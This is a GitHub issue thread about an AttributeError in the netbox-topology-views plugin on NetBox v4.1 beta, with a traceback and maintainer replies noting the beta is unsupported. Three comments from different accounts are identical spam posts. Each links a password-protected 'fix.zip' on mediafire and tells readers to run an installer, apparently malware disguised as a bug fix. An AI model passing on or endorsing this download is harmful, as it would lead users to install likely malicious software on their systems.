### ISSUE TITLE
AttributeError at /plugins/netbox_topology_views/topology/

### ISSUE THREAD

**Issue by PaulR282** [mattieserver/netbox-topology-views#560]
### NetBox version

v4.1.0-beta1

### Topology Views version

v4.0.1

### Steps to Reproduce

Set filters to e.g. see all devices of a site

### Expected Behavior

Topology should be shown

### Observed Behavior

```
AttributeError at /plugins/netbox_topology_views/topology/

'DeviceType' object has no attribute 'get_full_name'
```

```
Traceback (most recent call last):
  File "/opt/netbox/venv/lib/python3.11/site-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "/opt/netbox/venv/lib/python3.11/site-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/netbox/venv/lib/python3.11/site-packages/django/views/generic/base.py", line 104, in view
    return self.dispatch(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/netbox/venv/lib/python3.11/site-packages/django/contrib/auth/mixins.py", line 109, in dispatch
    return super().dispatch(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/netbox/venv/lib/python3.11/site-packages/django/views/generic/base.py", line 143, in dispatch
    return handler(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/plugins/netbox-topology-views/netbox_topology_views/views.py", line 769, in get
    topo_data = get_topology_data(
                
  File "/plugins/netbox-topology-views/netbox_topology_views/views.py", line 701, in get_topology_data
    nodes.append(create_node(d, save_coords, group_id))
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/plugins/netbox-topology-views/netbox_topology_views/views.py", line 149, in create_node
    dev_name = device.device_type.get_full_name
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Exception Type: AttributeError at /plugins/netbox_topology_views/topology/
Exception Value: 'DeviceType' object has no attribute 'get_full_name'
```

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mattieserver** [comment]
The plugin is currently not tested on v4.1-beta, so if you want to use the plugin you will have to downgrade to the latest stable version.

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PaulR282** [comment]
> The plugin is currently not tested on v4.1-beta, so if you want to use the plugin you will have to downgrade to the latest stable version.

Yes, I know. I test plugins in a staging system before I upgrade them in prod. The stage is running with the latest beta version. I still wanted to submit an issue because I don't know if it is a problem that only occurs in v4.1.

**Comment by mattieserver** [comment]
#565 was created to add support for v4.1.0
